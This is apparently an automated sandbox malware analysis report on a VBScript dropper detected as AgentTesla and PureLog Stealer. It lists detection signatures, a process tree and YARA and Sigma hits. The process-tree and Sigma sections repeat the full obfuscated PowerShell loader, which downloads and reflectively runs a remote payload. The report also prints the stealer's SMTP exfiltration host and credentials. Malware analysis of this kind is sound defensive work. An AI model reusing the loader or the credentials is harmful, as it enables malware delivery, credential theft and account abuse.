Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PofaABvatI.vbs

Overview

General Information

Sample name:PofaABvatI.vbs
renamed because original name is a hash value
Original sample name:05f1bfad1052e82ed6fc8d3348ea86f1958b8d8f39d331967edba843ce1214f7.vbs
Analysis ID:1523820
MD5:5b4a21e35cce386f8692a4a5d684cb14
SHA1:38cefdde89a5577f3d89396afd6fc15c8f89200e
SHA256:05f1bfad1052e82ed6fc8d3348ea86f1958b8d8f39d331967edba843ce1214f7
Tags:BlindEaglevbsuser-JAMESWT_MHT
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 2216 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PofaABvatI.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2952 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbU1RySW5HXSR2RVJib1NFUHJFZmVSRU5DRSlbMSwzXSsneCctam9JbicnKSggKCdETCcrJ2p1cmwnKycgPScrJyBGeUwnKydodHRwczonKycvL2lhNicrJzAwJysnMTAnKycwJysnLnVzLmFyY2hpdmUub3JnJysnLzInKyc0JysnL2l0ZW1zL2RlJysndGFoLW5vdGUtdi9EZXQnKydhJysnaE5vdGUnKydWJysnLnR4dCcrJ0Z5TDtETGpiJysnYXNlNicrJzRDb250ZW4nKyd0ID0nKycgJysnKCcrJ05ldy1PYmplY3QgJysnU3lzJysndGVtJysnLk5ldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLkRvJysndycrJ24nKydsbycrJ2FkU3RyJysnaW5nKERMaicrJ3VybCk7JysnRExqYicrJ2luYScrJ3J5Q29udGVudCAnKyc9IFtTeXMnKyd0ZW0uQ29udmVydF06JysnOkYnKydyb21CYXNlNjRTdHInKydpbicrJ2coRCcrJ0xqJysnYmEnKydzZTY0Q29udGVudCknKyc7REwnKydqYXMnKydzZScrJ20nKydibHkgPSBbJysnUmVmbGVjJysndCcrJ2knKydvbicrJy5BJysncycrJ3NlbScrJ2JsJysneScrJ10nKyc6OkwnKydvJysnYWQoRCcrJ0xqYmluYXInKyd5Q29uJysndGVudCcrJyk7RExqdCcrJ3knKydwJysnZSA9IERMamFzcycrJ2VtYmx5LkdldFQnKyd5cGUnKycoRnlMUnVuUEUnKycuSG8nKydtJysnZUZ5TCk7RExqJysnbScrJ2UnKyd0aG8nKydkID0gJysnRExqJysndCcrJ3knKydwZScrJy4nKydHZScrJ3RNJysnZXRob2QoJysnRnlMVkFJRnlMKTtEJysnTGptZXRob2QnKycuSW4nKyd2b2tlKERMJysnam51bGwsIFtvYmplY3RbXV1AKEZ5JysnTHR4dC5pbGltbScrJy92ZWQnKycuMnIuMzliMzQ1MzAnKycyYTA3NScrJ2IxYmMnKycwJysnZDQnKyc1YjYzJysnMmViOWVlNjItYnVwJysnLy86cycrJ3B0JysndCcrJ2gnKydGJysneUwgJysnLCBGeUwnKydkZXNhdGl2YWQnKydvRnknKydMICwnKycgRicrJ3lMZGVzYXRpdmEnKydkb0Z5TCcrJyAsIEYnKyd5TGRlcycrJ2F0aScrJ3ZhZG9GJysneScrJ0wsJysnRnknKydMUmVnQXNtRnlMLEZ5JysnTEZ5TCkpJykucmVQbEFDRSgnRExqJywnJCcpLnJlUGxBQ0UoJ0Z5TCcsW1N0UmluZ11bQ0hhcl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3776 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([STrInG]$vERboSEPrEfeRENCE)[1,3]+'x'-joIn'')( ('DL'+'jurl'+' ='+' FyL'+'https:'+'//ia6'+'00'+'10'+'0'+'.us.archive.org'+'/2'+'4'+'/items/de'+'tah-note-v/Det'+'a'+'hNote'+'V'+'.txt'+'FyL;DLjb'+'ase6'+'4Conten'+'t ='+' '+'('+'New-Object '+'Sys'+'tem'+'.Net.'+'We'+'bCli'+'e'+'nt'+').Do'+'w'+'n'+'lo'+'adStr'+'ing(DLj'+'url);'+'DLjb'+'ina'+'ryContent '+'= [Sys'+'tem.Convert]:'+':F'+'romBase64Str'+'in'+'g(D'+'Lj'+'ba'+'se64Content)'+';DL'+'jas'+'se'+'m'+'bly = ['+'Reflec'+'t'+'i'+'on'+'.A'+'s'+'sem'+'bl'+'y'+']'+'::L'+'o'+'ad(D'+'Ljbinar'+'yCon'+'tent'+');DLjt'+'y'+'p'+'e = DLjass'+'embly.GetT'+'ype'+'(FyLRunPE'+'.Ho'+'m'+'eFyL);DLj'+'m'+'e'+'tho'+'d = '+'DLj'+'t'+'y'+'pe'+'.'+'Ge'+'tM'+'ethod('+'FyLVAIFyL);D'+'Ljmethod'+'.In'+'voke(DL'+'jnull, [object[]]@(Fy'+'Ltxt.ilimm'+'/ved'+'.2r.39b34530'+'2a075'+'b1bc'+'0'+'d4'+'5b63'+'2eb9ee62-bup'+'//:s'+'pt'+'t'+'h'+'F'+'yL '+', FyL'+'desativad'+'oFy'+'L ,'+' F'+'yLdesativa'+'doFyL'+' , F'+'yLdes'+'ati'+'vadoF'+'y'+'L,'+'Fy'+'LRegAsmFyL,Fy'+'LFyL))').rePlACE('DLj','$').rePlACE('FyL',[StRing][CHar]39) )" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegAsm.exe (PID: 4832 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 6080 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 516 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 4468 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 6264 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.detarcoopmedical.com", "Username": "mail@detarcoopmedical.com", "Password": "To$zL%?nhDHN"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.1595867471.000001A064DD0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000004.00000002.1572696203.000001A05D8A9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.1572696203.000001A05D8A9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000004.00000002.1572696203.000001A05CEA9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          Process Memory Space: powershell.exe PID: 2952INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x2676:$b3: ::UTF8.GetString(
          • 0x2723:$b3: ::UTF8.GetString(
          • 0x2d78:$b3: ::UTF8.GetString(
          • 0x17b63:$b3: ::UTF8.GetString(
          • 0x30278:$b3: ::UTF8.GetString(
          • 0x30a6d:$b3: ::UTF8.GetString(
          • 0x310fc:$b3: ::UTF8.GetString(
          • 0x60353:$b3: ::UTF8.GetString(
          • 0x6a7f6:$b3: ::UTF8.GetString(
          • 0x6ae74:$b3: ::UTF8.GetString(
          • 0xacb01:$b3: ::UTF8.GetString(
          • 0xad17f:$b3: ::UTF8.GetString(
          • 0xc5828:$b3: ::UTF8.GetString(
          • 0xc5ea6:$b3: ::UTF8.GetString(
          • 0xcc161:$b3: ::UTF8.GetString(
          • 0xcc934:$b3: ::UTF8.GetString(
          • 0xcd413:$b3: ::UTF8.GetString(
          • 0xcda98:$b3: ::UTF8.GetString(
          • 0xce2d8:$b3: ::UTF8.GetString(
          • 0xceaf6:$b3: ::UTF8.GetString(
          • 0xcf3f1:$b3: ::UTF8.GetString(
          Click to see the 4 entries
          SourceRuleDescriptionAuthorStrings
          4.2.powershell.exe.1a05d6bd738.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            4.2.powershell.exe.1a064dd0000.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              4.2.powershell.exe.1a064dd0000.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                4.2.powershell.exe.1a05d6bd738.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbU1RySW5HXSR2RVJib1NFUHJFZmVSRU5DRSlbMSwzXSsneCctam9JbicnKSggKCdETCcrJ2p1cmwnKycgPScrJyBGeUwnKydodHRwczonKycvL2lhNicrJzAwJysnMTAnKycwJysnLnVzLmFyY2hpdmUub3JnJysnLzInKyc0JysnL2l0ZW1zL2RlJysndGFoLW5vdGUtdi9EZXQnKydhJysnaE5vdGUnKydWJysnLnR4dCcrJ0Z5TDtETGpiJysnYXNlNicrJzRDb250ZW4nKyd0ID0nKycgJysnKCcrJ05ldy1PYmplY3QgJysnU3lzJysndGVtJysnLk5ldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLkRvJysndycrJ24nKydsbycrJ2FkU3RyJysnaW5nKERMaicrJ3VybCk7JysnRExqYicrJ2luYScrJ3J5Q29udGVudCAnKyc9IFtTeXMnKyd0ZW0uQ29udmVydF06JysnOkYnKydyb21CYXNlNjRTdHInKydpbicrJ2coRCcrJ0xqJysnYmEnKydzZTY0Q29udGVudCknKyc7REwnKydqYXMnKydzZScrJ20nKydibHkgPSBbJysnUmVmbGVjJysndCcrJ2knKydvbicrJy5BJysncycrJ3NlbScrJ2JsJysneScrJ10nKyc6OkwnKydvJysnYWQoRCcrJ0xqYmluYXInKyd5Q29uJysndGVudCcrJyk7RExqdCcrJ3knKydwJysnZSA9IERMamFzcycrJ2VtYmx5LkdldFQnKyd5cGUnKycoRnlMUnVuUEUnKycuSG8nKydtJysnZUZ5TCk7RExqJysnbScrJ2UnKyd0aG8nKydkID0gJysnRExqJysndCcrJ3knKydwZScrJy4nKydHZScrJ3RNJysnZXRob2QoJysnRnlMVkFJRnlMKTtEJysnTGptZXRob2QnKycuSW4nKyd2b2tlKERMJysnam51bGwsIFtvYmplY3RbXV1AKEZ5JysnTHR4dC5pbGltbScrJy92ZWQnKycuMnIuMzliMzQ1MzAnKycyYTA3NScrJ2IxYmMnKycwJysnZDQnKyc1YjYzJysnMmViOWVlNjItYnVwJysnLy86cycrJ3B0JysndCcrJ2gnKydGJysneUwgJysnLCBGeUwnKydkZXNhdGl2YWQnKydvRnknKydMICwnKycgRicrJ3lMZGVzYXRpdmEnKydkb0Z5TCcrJyAsIEYnKyd5TGRlcycrJ2F0aScrJ3ZhZG9GJysneScrJ0wsJysnRnknKydMUmVnQXNtRnlMLEZ5JysnTEZ5TCkpJykucmVQbEFDRSgnRExqJywnJCcpLnJlUGxBQ0UoJ0Z5TCcsW1N0UmluZ11bQ0hhcl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbU1RySW5HXSR2RVJib1NFUHJFZmVSRU5DRSlbMSwzXSsneCctam9JbicnKSggKCdETCcrJ2p1cmwnKycgPScrJyBGeUwnKydodHRwczonKycvL2lhNicrJzAwJysnMTAnKycwJysnLnVzLmFyY2hpdmUub3JnJysnLzInKyc0JysnL2l0ZW1zL2RlJysndGFoLW5vdGUtdi9EZXQnKydhJysnaE5vdGUnKydWJysnLnR4dCcrJ0Z5TDtETGpiJysnYXNlNicrJzRDb250ZW4nKyd0ID0nKycgJysnKCcrJ05ldy1PYmplY3QgJysnU3lzJysndGVtJysnLk5ldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLkRvJysndycrJ24nKydsbycrJ2FkU3RyJysnaW5nKERMaicrJ3VybCk7JysnRExqYicrJ2luYScrJ3J5Q29udGVudCAnKyc9IFtTeXMnKyd0ZW0uQ29udmVydF06JysnOkYnKydyb21CYXNlNjRTdHInKydpbicrJ2coRCcrJ0xqJysnYmEnKydzZTY0Q29udGVudCknKyc7REwnKydqYXMnKydzZScrJ20nKydibHkgPSBbJysnUmVmbGVjJysndCcrJ2knKydvbicrJy5BJysncycrJ3NlbScrJ2JsJysneScrJ10nKyc6OkwnKydvJysnYWQoRCcrJ0xqYmluYXInKyd5Q29uJysndGVudCcrJyk7RExqdCcrJ3knKydwJysnZSA9IERMamFzcycrJ2VtYmx5LkdldFQnKyd5cGUnKycoRnlMUnVuUEUnKycuSG8nKydtJysnZUZ5TCk7RExqJysnbScrJ2UnKyd0aG8nKydkID0gJysnRExqJysndCcrJ3knKydwZScrJy4nKydHZScrJ3RNJysnZXRob2QoJysnRnlMVkFJRnlMKTtEJysnTGptZXRob2QnKycuSW4nKyd2b2tlKERMJysnam51bGwsIFtvYmplY3RbXV1AKEZ5JysnTHR4dC5pbGltbScrJy92ZWQnKycuMnIuMzliMzQ1MzAnKycyYTA3NScrJ2IxYmMnKycwJysnZDQnKyc1YjYzJysnMmViOWVlNjItYnVwJysnLy86cycrJ3B0JysndCcrJ2gnKydGJysneUwgJysnLCBGeUwnKydkZXNhdGl2YWQnKydvRnknKydM
                  Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([STrInG]$vERboSEPrEfeRENCE)[1,3]+'x'-joIn'')( ('DL'+'jurl'+' ='+' FyL'+'https:'+'//ia6'+'00'+'10'+'0'+'.us.archive.org'+'/2'+'4'+'/items/de'+'tah-note-v/Det'+'a'+'hNote'+'V'+'.txt'+'FyL;DLjb'+'ase6'+'4Conten'+'t ='+' '+'('+'New-Object '+'Sys'+'tem'+'.Net.'+'We'+'bCli'+'e'+'nt'+').Do'+'w'+'n'+'lo'+'adStr'+'ing(DLj'+'url);'+'DLjb'+'ina'+'ryContent '+'= [Sys'+'tem.Convert]:'+':F'+'romBase64Str'+'in'+'g(D'+'Lj'+'ba'+'se64Content)'+';DL'+'jas'+'se'+'m'+'bly = ['+'Reflec'+'t'+'i'+'on'+'.A'+'s'+'sem'+'bl'+'y'+']'+'::L'+'o'+'ad(D'+'Ljbinar'+'yCon'+'tent'+');DLjt'+'y'+'p'+'e = DLjass'+'embly.GetT'+'ype'+'(FyLRunPE'+'.Ho'+'m'+'eFyL);DLj'+'m'+'e'+'tho'+'d = '+'DLj'+'t'+'y'+'pe'+'.'+'Ge'+'tM'+'ethod('+'FyLVAIFyL);D'+'Ljmethod'+'.In'+'voke(DL'+'jnull, [object[]]@(Fy'+'Ltxt.ilimm'+'/ved'+'.2r.39b34530'+'2a075'+'b1bc'+'0'+'d4'+'5b63'+'2eb9ee62-bup'+'//:s'+'pt'+'t'+'h'+'F'+'yL '+', FyL'+'desativad'+'oFy'+'L ,'+' F'+'yLdesativa'+'doFyL'+' , F'+'yLdes'+'ati'+'vadoF'+'y'+'L,'+'Fy'+'LRegAsmFyL,Fy'+'LFyL))').rePlACE('DLj','$').rePlACE('FyL',[StRing][CHar]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([STrInG]$vERboSEPrEfeRENCE)[1,3]+'x'-joIn'')( ('DL'+'jurl'+' ='+' FyL'+'https:'+'//ia6'+'00'+'10'+'0'+'.us.archive.org'+'/2'+'4'+'/items/de'+'tah-note-v/Det'+'a'+'hNote'+'V'+'.txt'+'FyL;DLjb'+'ase6'+'4Conten'+'t ='+' '+'('+'New-Object '+'Sys'+'tem'+'.Net.'+'We'+'bCli'+'e'+'nt'+').Do'+'w'+'n'+'lo'+'adStr'+'ing(DLj'+'url);'+'DLjb'+'ina'+'ryContent '+'= [Sys'+'tem.Convert]:'+':F'+'romBase64Str'+'in'+'g(D'+'Lj'+'ba'+'se64Content)'+';DL'+'jas'+'se'+'m'+'bly = ['+'Reflec'+'t'+'i'+'on'+'.A'+'s'+'sem'+'bl'+'y'+']'+'::L'+'o'+'ad(D'+'Ljbinar'+'yCon'+'tent'+');DLjt'+'y'+'p'+'e = DLjass'+'embly.GetT'+'ype'+'(FyLRunPE'+'.Ho'+'m'+'eFyL);DLj'+'m'+'e'+'tho'+'d = '+'DLj'+'t'+'y'+'pe'+'.'+'Ge'+'tM'+'ethod('+'FyLVAIFyL);D'+'Ljmethod'+'.In'+'voke(DL'+'jnull, [object[]]@(Fy'+'Ltxt.ilimm'+'/ved'+'.2r.39b34530'+'2a075'+'b1bc'+'0'+'d4'+'5b63'+'2eb9ee62-bup'+'//:s'+'pt'+'t'+'h'+'F'+'yL '+', FyL'+'desativad'+'oFy'+'L ,'+' F'+'yLdesativa'+'doFyL'+' , F'+'yLdes'+'ati'+'vadoF'+'y'+'L,'+'Fy'+'LRegAsmFyL,Fy'+'LFyL))').rePlACE('DLj','$').rePlACE('FyL',[StRing][CHar]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbU1RySW5HXSR2RVJib1NFUHJFZmVSRU5DRSlbMSwzXSsneCctam9JbicnKSggKCdETCcrJ2p1cmwnKycgPScrJyBGeUwnKydodHRwczonKycvL2lhNicrJzAwJysnMTAnKycwJysnLnVzLmFyY2hpdmUub3JnJysnLzInKyc0JysnL2l0ZW1zL2RlJysndGFoLW5vdGUtdi9EZXQnKydhJysnaE5vdGUnK
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([STrInG]$vERboSEPrEfeRENCE)[1,3]+'x'-joIn'')( ('DL'+'jurl'+' ='+' FyL'+'https:'+'//ia6'+'00'+'10'+'0'+'.us.archive.org'+'/2'+'4'+'/items/de'+'tah-note-v/Det'+'a'+'hNote'+'V'+'.txt'+'FyL;DLjb'+'ase6'+'4Conten'+'t ='+' '+'('+'New-Object '+'Sys'+'tem'+'.Net.'+'We'+'bCli'+'e'+'nt'+').Do'+'w'+'n'+'lo'+'adStr'+'ing(DLj'+'url);'+'DLjb'+'ina'+'ryContent '+'= [Sys'+'tem.Convert]:'+':F'+'romBase64Str'+'in'+'g(D'+'Lj'+'ba'+'se64Content)'+';DL'+'jas'+'se'+'m'+'bly = ['+'Reflec'+'t'+'i'+'on'+'.A'+'s'+'sem'+'bl'+'y'+']'+'::L'+'o'+'ad(D'+'Ljbinar'+'yCon'+'tent'+');DLjt'+'y'+'p'+'e = DLjass'+'embly.GetT'+'ype'+'(FyLRunPE'+'.Ho'+'m'+'eFyL);DLj'+'m'+'e'+'tho'+'d = '+'DLj'+'t'+'y'+'pe'+'.'+'Ge'+'tM'+'ethod('+'FyLVAIFyL);D'+'Ljmethod'+'.In'+'voke(DL'+'jnull, [object[]]@(Fy'+'Ltxt.ilimm'+'/ved'+'.2r.39b34530'+'2a075'+'b1bc'+'0'+'d4'+'5b63'+'2eb9ee62-bup'+'//:s'+'pt'+'t'+'h'+'F'+'yL '+', FyL'+'desativad'+'oFy'+'L ,'+' F'+'yLdesativa'+'doFyL'+' , F'+'yLdes'+'ati'+'vadoF'+'y'+'L,'+'Fy'+'LRegAsmFyL,Fy'+'LFyL))').rePlACE('DLj','$').rePlACE('FyL',[StRing][CHar]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([STrInG]$vERboSEPrEfeRENCE)[1,3]+'x'-joIn'')( ('DL'+'jurl'+' ='+' FyL'+'https:'+'//ia6'+'00'+'10'+'0'+'.us.archive.org'+'/2'+'4'+'/items/de'+'tah-note-v/Det'+'a'+'hNote'+'V'+'.txt'+'FyL;DLjb'+'ase6'+'4Conten'+'t ='+' '+'('+'New-Object '+'Sys'+'tem'+'.Net.'+'We'+'bCli'+'e'+'nt'+').Do'+'w'+'n'+'lo'+'adStr'+'ing(DLj'+'url);'+'DLjb'+'ina'+'ryContent '+'= [Sys'+'tem.Convert]:'+':F'+'romBase64Str'+'in'+'g(D'+'Lj'+'ba'+'se64Content)'+';DL'+'jas'+'se'+'m'+'bly = ['+'Reflec'+'t'+'i'+'on'+'.A'+'s'+'sem'+'bl'+'y'+']'+'::L'+'o'+'ad(D'+'Ljbinar'+'yCon'+'tent'+');DLjt'+'y'+'p'+'e = DLjass'+'embly.GetT'+'ype'+'(FyLRunPE'+'.Ho'+'m'+'eFyL);DLj'+'m'+'e'+'tho'+'d = '+'DLj'+'t'+'y'+'pe'+'.'+'Ge'+'tM'+'ethod('+'FyLVAIFyL);D'+'Ljmethod'+'.In'+'voke(DL'+'jnull, [object[]]@(Fy'+'Ltxt.ilimm'+'/ved'+'.2r.39b34530'+'2a075'+'b1bc'+'0'+'d4'+'5b63'+'2eb9ee62-bup'+'//:s'+'pt'+'t'+'h'+'F'+'yL '+', FyL'+'desativad'+'oFy'+'L ,'+' F'+'yLdesativa'+'doFyL'+' , F'+'yLdes'+'ati'+'vadoF'+'y'+'L,'+'Fy'+'LRegAsmFyL,Fy'+'LFyL))').rePlACE('DLj','$').rePlACE('FyL',[StRing][CHar]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbU1RySW5HXSR2RVJib1NFUHJFZmVSRU5DRSlbMSwzXSsneCctam9JbicnKSggKCdETCcrJ2p1cmwnKycgPScrJyBGeUwnKydodHRwczonKycvL2lhNicrJzAwJysnMTAnKycwJysnLnVzLmFyY2hpdmUub3JnJysnLzInKyc0JysnL2l0ZW1zL2RlJysndGFoLW5vdGUtdi9EZXQnKydhJysnaE5vdGUnK
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbU1RySW5HXSR2RVJib1NFUHJFZmVSRU5DRSlbMSwzXSsneCctam9JbicnKSggKCdETCcrJ2p1cmwnKycgPScrJyBGeUwnKydodHRwczonKycvL2lhNicrJzAwJysnMTAnKycwJysnLnVzLmFyY2hpdmUub3JnJysnLzInKyc0JysnL2l0ZW1zL2RlJysndGFoLW5vdGUtdi9EZXQnKydhJysnaE5vdGUnKydWJysnLnR4dCcrJ0Z5TDtETGpiJysnYXNlNicrJzRDb250ZW4nKyd0ID0nKycgJysnKCcrJ05ldy1PYmplY3QgJysnU3lzJysndGVtJysnLk5ldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLkRvJysndycrJ24nKydsbycrJ2FkU3RyJysnaW5nKERMaicrJ3VybCk7JysnRExqYicrJ2luYScrJ3J5Q29udGVudCAnKyc9IFtTeXMnKyd0ZW0uQ29udmVydF06JysnOkYnKydyb21CYXNlNjRTdHInKydpbicrJ2coRCcrJ0xqJysnYmEnKydzZTY0Q29udGVudCknKyc7REwnKydqYXMnKydzZScrJ20nKydibHkgPSBbJysnUmVmbGVjJysndCcrJ2knKydvbicrJy5BJysncycrJ3NlbScrJ2JsJysneScrJ10nKyc6OkwnKydvJysnYWQoRCcrJ0xqYmluYXInKyd5Q29uJysndGVudCcrJyk7RExqdCcrJ3knKydwJysnZSA9IERMamFzcycrJ2VtYmx5LkdldFQnKyd5cGUnKycoRnlMUnVuUEUnKycuSG8nKydtJysnZUZ5TCk7RExqJysnbScrJ2UnKyd0aG8nKydkID0gJysnRExqJysndCcrJ3knKydwZScrJy4nKydHZScrJ3RNJysnZXRob2QoJysnRnlMVkFJRnlMKTtEJysnTGptZXRob2QnKycuSW4nKyd2b2tlKERMJysnam51bGwsIFtvYmplY3RbXV1AKEZ5JysnTHR4dC5pbGltbScrJy92ZWQnKycuMnIuMzliMzQ1MzAnKycyYTA3NScrJ2IxYmMnKycwJysnZDQnKyc1YjYzJysnMmViOWVlNjItYnVwJysnLy86cycrJ3B0JysndCcrJ2gnKydGJysneUwgJysnLCBGeUwnKydkZXNhdGl2YWQnKydvRnknKydMICwnKycgRicrJ3lMZGVzYXRpdmEnKydkb0Z5TCcrJyAsIEYnKyd5TGRlcycrJ2F0aScrJ3ZhZG9GJysneScrJ0wsJysnRnknKydMUmVnQXNtRnlMLEZ5JysnTEZ5TCkpJykucmVQbEFDRSgnRExqJywnJCcpLnJlUGxBQ0UoJ0Z5TCcsW1N0UmluZ11bQ0hhcl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbU1RySW5HXSR2RVJib1NFUHJFZmVSRU5DRSlbMSwzXSsneCctam9JbicnKSggKCdETCcrJ2p1cmwnKycgPScrJyBGeUwnKydodHRwczonKycvL2lhNicrJzAwJysnMTAnKycwJysnLnVzLmFyY2hpdmUub3JnJysnLzInKyc0JysnL2l0ZW1zL2RlJysndGFoLW5vdGUtdi9EZXQnKydhJysnaE5vdGUnKydWJysnLnR4dCcrJ0Z5TDtETGpiJysnYXNlNicrJzRDb250ZW4nKyd0ID0nKycgJysnKCcrJ05ldy1PYmplY3QgJysnU3lzJysndGVtJysnLk5ldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLkRvJysndycrJ24nKydsbycrJ2FkU3RyJysnaW5nKERMaicrJ3VybCk7JysnRExqYicrJ2luYScrJ3J5Q29udGVudCAnKyc9IFtTeXMnKyd0ZW0uQ29udmVydF06JysnOkYnKydyb21CYXNlNjRTdHInKydpbicrJ2coRCcrJ0xqJysnYmEnKydzZTY0Q29udGVudCknKyc7REwnKydqYXMnKydzZScrJ20nKydibHkgPSBbJysnUmVmbGVjJysndCcrJ2knKydvbicrJy5BJysncycrJ3NlbScrJ2JsJysne